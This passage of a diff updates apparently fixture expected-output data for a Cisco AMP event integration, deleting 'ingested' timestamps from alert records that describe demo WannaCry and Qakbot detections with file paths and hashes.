"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"6951045.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\6951045.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "severity": 3 @@ -5582,7 +5514,6 @@ ], "code": "553648147", "id": "6411538569722069000", - "ingested": "2022-02-02T05:52:43.212780946Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"Auto.BAC7BC5281.in10.tht.Talos\",\"detection_id\":\"6411538569722068993\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"99fffe78e0cbd7b508eed13a8633903dd89ed5f1\",\"md5\":\"dc41e47ebba549ec5e616ed9e88a0376\"}}}}", "severity": 3 @@ -5668,7 +5599,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212781911Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -5744,7 +5674,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212782728Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -5820,7 +5749,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212783533Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -5896,7 +5824,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212784368Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":297000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064606\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -5972,7 +5899,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212785174Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064605\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -6048,7 +5974,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212786087Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064607\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -6124,7 +6049,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212786894Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064604\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -6200,7 +6124,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212787690Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064603\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -6276,7 +6199,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212788539Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -6352,7 +6274,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212789347Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -6428,7 +6349,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212790156Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -6504,7 +6424,6 @@ ], "code": "2164260880", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212791128Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -6582,7 +6501,6 @@ ], "code": "1090519054", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212791933Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":3200,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}", "severity": 2 @@ -6681,7 +6599,6 @@ ], "code": "1090519054", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212792804Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":235000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2708,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "severity": 2 @@ -6778,7 +6695,6 @@ ], "code": "1090519054", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212793633Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":172000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "severity": 2 @@ -6862,7 +6778,6 @@ ], "code": "553648143", "id": "6419275399255032000", - "ingested": "2022-02-02T05:52:43.212794454Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat 